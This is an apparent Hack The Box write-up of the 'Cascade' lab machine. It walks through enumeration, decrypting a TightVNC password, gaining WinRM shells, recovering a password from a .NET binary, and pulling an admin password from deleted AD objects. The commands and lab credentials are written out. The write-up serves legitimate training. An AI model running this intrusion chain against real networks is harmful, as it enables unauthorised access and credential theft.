HTB | Cascade
This is the Box on Hack The Box Active Directory 101 Track. Find the box here.
Skill Learned
TightVNC Password Extraction
Active Directory Enumeration
Reverse Engineering - DnSpy
AD Recycle Bin
NMAP
IP: 10.10.10.182
nmap -sT -p- --min-rate 10000 10.10.10.182

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182 -Pn

SMB & RPC
SMBMAP and SMBClient are not working
smbmap -H 10.10.10.182

Let's try rpcclient
rpcclient -U "" -N 10.10.10.182

I will copy the users
Let's see groups

LDAP - TCP 389
To enumerate LDAP, first I’ll get the naming context:
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts

I will dump all the info in a file:
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous
and Now I will look for valuable information While looking in the file I found a password for Ryan

Since it is a base64 I can decode it

Foothold/shell
Let's check the cred for winrm and smb

SMB is possible but winrm is not
smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva

Since we have Read Only on soe shares let's take a look
There are many files in each of the shares I have access to. I use the following commands to just pull all the files in each share (Data for example):
mask ""
recurse ON
prompt OFF
mget *

there are 5 folders

We found some files in the IT folder
find IT/ -type f

On opening the Meeting Notes we found

According to the mail We have to keep an eye out for the admin account password and TempAdmin.
Let's cat the VNC Install.reg

The line "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.
Crack TightVNC Password
This GitHub repo guides us to decrypt VNC password using msfconsole

There was another way shown in the repo
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Now That we have the password let's try it with SMB and WinRM.
Winrm worked
crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2

I’ll use Evil-WinRM to get a shell:
evil-winrm -i 10.10.10.182 -u s.smith -p 'sT333ve2'

and we are in. found user.txt

Priv Esc
s.smith is a member of the Audit Share group:
net user s.smith

Since it is not a standard Microsoft group, let's check
net localgroup "Audit Share"

s.smith is the only user in the group, but the comment has a useful hint to look at this share. There’s a c:\shares, but I don’t have permission to list the directories in it:

however, I can cd into Shares\Audit based on the name from the comment

Since I have access to Audit Share:
smbmap -H 10.10.10.182 -u s.smith -p 'sT333ve2'

I will copy all the files to my local system

We found an Audit.db file

Let's dump the tables using sqlite3

Nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded data didn’t decode to ASCII. Perhaps it’s encrypted somehow.
CascAudit.exe & DnSpy
RunAudit.bat shows that CascAudit.exe is run with the DB file as an argument:

It's a .NET binary

Download DnSpy and load the exe on it

It opens an SQLite connection to the database passed as an arg, reading from the LDAP table, and decrypting the password.
I decided to recover the plaintext password by debugging. I put a breakpoint on line 53 where the SQL connection is closed. Then I went Debug -> Start Debugging,
and set the Arugument to where I had a copy of the Audit.db:

Note: Copy all the files including SQLite dll files to Windows before starting the debug
On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:

Based on the line in the SQLite DB, this password, w3lc0meFr31nd
, likely pairs with the account arksvc
.
Let's try this password for WinRM crackmapexec shows that not only does the password works:

Had I not known the account that was associated with this password, I could have used crackmapexec with a list of users(list that we git from rpcclient):
crackmapexec winrm 10.10.10.182 -u user.txt -p w3lc0meFr31nd --continue-on-success

and we are in

from whoami /groups
we can see arksvc is a part of AD Recycle

AD Recycle
AD Recycle Bin is a well-known Windows group. Active Directory Object Recovery (or Recycle Bin) is a feature added in Server 2008 to allow administrators to recover deleted items just like the recycle bin does for files. The linked article gives a PowerShell command to query all of the deleted objects within a domain:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

The last one is really interesting, because it’s the temporary administrator account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account).
I can get all the details for that account:
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *

Immediately cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
jumps out. It decodes to baCT3r1aN00dles
:

using this password for administrator account and we are in

and we have root.txt

Last updated